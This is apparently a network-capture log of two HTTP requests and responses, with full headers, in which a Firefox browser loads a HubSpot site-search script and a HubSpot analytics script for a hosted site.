                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019149/module_-2712622_Site_Search_Input.min.js HTTP/1.1 
Host: cdn2.hubspot.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.244.204
HTTP/2 200 OK
content-type: text/plain;charset=utf-8
x-hs-alternate-content-type: text/plain
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
cf-ray: 74acb65dcb36b4eb-OSL
access-control-allow-origin: *
age: 183372
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"0953d5b1fcbcfc6d9e817b542caf4b9f"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019149
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bnVBDNLWPhKSzDPBuoI2e3Y4TzCnqdlTMM22SSMOTLmZtDkf1XWwYf8PNIgmR7OmRR2KPubUMHsMFsv2T0jak7JYcmsPjNTd0RaMGxzQYywcKeoM8MCKwbSKPTW7BrRml9E%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /analytics/1663196100000/26246913.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
x-amz-id-2: BUM8I5DuHki3qtkSn6lu4nECwZ+qXk/r8ULxeBev5YqgYDXY/6j6D3qG+53BTtuQeCGPWjZjoDE=
x-amz-request-id: V6WM942M2RD0X5KM
last-modified: Tue, 13 Sep 2022 13:50:54 GMT
etag: W/"a465556d49817da34d8ad624037e7756"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Wed, 14 Sep 2022 23:00:50 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74acb6628a3c98eb-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---